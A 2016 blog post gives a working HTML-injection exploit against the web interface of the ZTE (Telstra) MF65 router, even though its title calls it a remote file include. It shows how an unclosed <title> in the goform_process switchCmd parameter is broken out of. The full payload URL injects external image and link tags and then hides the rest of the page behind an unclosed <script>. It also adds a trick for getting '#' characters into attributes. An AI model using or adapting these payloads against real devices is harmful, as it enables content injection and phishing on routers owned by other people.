Wednesday, 1 June 2016

ZTE(telstra)MF65 -Remote file include-

ZTE(telstra)MF65

Remote file include :

this exploit uses :
http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=
and exploits the loose handling of closing html tags because the switchCmd  page  uses a unclosed <title> tag to normally write the switch command and return either success or fail in the page title, this leads us to closing the <tiltle> and starting a new tag, i found <xyz> worked as an arbitrary tag 
, this worked great(you could use anything in there), so we have :
 switchCmd=pagenamegoeshere</title><xyz>

and using the img tag and span tags we get


<img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this will take us out of the local net</span></a></span>

then we close out the <xyz>

and finally we use a unclosed <script> to hide the rest of the normal output 
in total we get:

 http://Your-R-IP/goform/goform_process?goformId=MODE_SWITCH&switchCmd=pagenamegoeshere</title><xyz><img border=0 width=300 height=200 src="https://www.google.com.au/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"alt="some crap goes here" v:shapes="and here as well"><span><p><a href="http://google.com" target="_blank"><span class="index_toplink">this will take us out of the local net</span></a></span></xyz><script> 


we cant use & or # symbols in the scripts so it makes it kinda hard to utilise all of  scripting used by the webserver although 
 this can be used to append # to objects via scripting:
 
<a trans="  ? " href="  ? " data-bind="attr: {href: hash, trans: hash.substring(1)}">
gives href:# ?
and  trans:# ?


till next time

No comments:

Post a Comment